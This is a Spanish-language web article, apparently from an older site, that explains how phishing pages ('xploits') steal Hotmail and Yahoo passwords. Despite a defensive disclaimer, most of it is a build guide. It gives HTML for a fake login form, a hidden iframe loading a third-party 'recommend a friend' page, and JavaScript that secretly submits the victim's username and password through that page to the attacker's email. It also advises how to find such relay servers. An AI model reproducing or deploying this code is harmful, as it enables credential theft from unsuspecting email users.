Nickname A Chatear seguro hay alguien conectado

Atención, los servidores de correo electrónico Yahoo y Hotmail no envían correos desde donde se solicite la contraseña, el nombre de usuario o la pregunta y respuesta secreta.
Este articulo no esta orientado a aquellos que quieren descubrir contraseñas de correo electrónico, hecho que es ilegal. Si esta orientado a aquellos que quieren entender como son y como funcionan los xploits mas avanzados y también para saber como defenderse.
Para empezar la mayoría de los xploits que andan dando vuelta por ahí no funcionan por dos motivos:
Primero: los servidores emparentados con el envío de correo electrónico que utilizan los xploits para enviar los datos de la victima al e-mail del atacante no funcionan la mayoría de las veces.
Segundo: Tanto Yahoo como Hotmail abren todos los vínculos disparados desde adentro de un correo en una página de marcos. En la parte superior tiene una leyenda del tipo “Usted esta fuera de Hotmail” y en la parte inferior esta la pagina solicitada, si esta pagina tiene un paso de variables o sea es del tipo “http://www.xxxxx.com/xploit.asp?pass=xxx” estas variables no llegan a destino.

Como contrarrestan estos inconvenientes los nuevos Xploits:
Para el primer caso la nueva técnica utiliza servidores de cualquier otra empresa que tengan un sistema automático de envió de correo electrónico, como son por ejemplo los sistemas de recomendar a un amigo.
Para saber que servidores se pueden utilizar basta con buscar en Google la frase “recomienda a un amigo” que nos da cerca 80.000 sitios, existen servidores para elegir sin duda.
La gran diferencia entre los primeros xploits y los nuevos es que los últimos utilizan un servidor muy difícil de rastrear, ya que estos xploits no son de tirada masiva y son utilizados por un pequeño grupo, el cual puede cambiar de servidor cuando este presente alguna protección.
Para entender como funciona es necesario que sepan que el xploit en este caso no es el correo electrónico sino una archivo .htm que se encuentra en cualquier servidor gratuito como Geocities o Gratisweb. En el correo electrónico se envía una especie de publicidad totalmente linkeada al xploit verdadero de esta forma se salta el inconveniente de la pagina de marcos.
Como utilizan un servidor totalmente ajeno al xploit, esta parte es demasiada sencilla y lo único que el atacante tiene que saber es un poco de Html y Javascript, en la página que es el xploit se coloca un iframe (ver abajo) oculto esto se logra incluyendo el código del iframe dentro de una layer o capa oculta, como por ejemplo el siguiente:

<div id="oculta" style="position:absolute; visibility: hidden;">
<iframe src="http://www.xxxxxxx.com/recomendar.htm" name="mail"></iframe>
</div>

luego se identifican los campos útiles dentro de la pagina victima elegida para el envió que son:

<FORM action=xxxxx method=post name="formrecomienda">
<INPUT type="text" name="maildeusuario">
<INPUT type="text" name="mailamigo">
<INPUT type="text" size="30" name="nombreamigo">
<INPUT type="text" size="30 "name="nombredeusuario">
</FORM>

Además en la pagina xploit tenemos el siguiente formulario (es el que simula ser de Hotmail o Yahoo):

<FORM name="recomienda">
<INPUT type="hidden" name="maildeusuario" value="[email protected]">
<INPUT type="hidden" name="mail" value="donderecibirlacontraseñ[email protected]">
<INPUT type="text" size="30" name="usuario">
<INPUT type="password" size="30 "name="pass">
<INPUT type="button" value="Enviar" Onclick="cambiayenvia()">
</FORM>

A partir de allí tenemos un formulario donde la victima colocara sus datos que en vez de enviar los datos llama a una función Javascript, y por otro lado tenemos un iframe oculto que es donde la función Javascript va a escribir los datos y va a enviarlos a la pagina victima para que a su vez los escriba en un correo electrónico y los envíe (todo a escondidas de la victima, a la victima no le aparecerá nada por que el iframe esta en una div oculta).

La función Javascript tendría el siguiente código:

<script language="JavaScript" type="text/JavaScript">
function cambiayenvia(){
//los cuatro primeros renglones de la función escriben los datos en la pagina victima
mail.formrecomienda.maildeusuario.value=document.recomienda.maildeusuario.value;
mail.formrecomienda.mailamigo.value=document.recomienda.mail.value;
mail.formrecomienda.nombreamigo.value=document.recomienda.usuario.value;
mail.formrecomienda.nombredeusuario.value=document.recomienda.pass.value;
mail.formrecomienda.submit();//envia el formulario de la pagina victima
}
</script>
Bueno ese es el código básico, cada persona que desea utilizar ese tipo de xploit debe crearlo desde cero o modificar uno ya hecho, lo cual siempre implica abrir una cuenta en un servidor gratuito.
Siempre hay que tener en cuenta que no debemos colocar nuestro nombre de usuario contraseña y preguntas secretas dentro de un mail por mas verdadero que parezca esos mails no existen.

iframe: un iframe es una etiqueta Html que no se encuentra dentro del Standard internacional pero que es soportada desde su versión 4 por Internet Explorer y desde la versión 6 por Netscape, en las versiones anteriores de Netscape la etiqueta mas parecida es ilayer que para el caso en cuestión tienen el mismo comportamiento.

Para enviar esta pagina a un amigo solo coloca el link en un e-mail:

 

(volver al inicio)
Agregar a los Favoritos | Establecer como inicio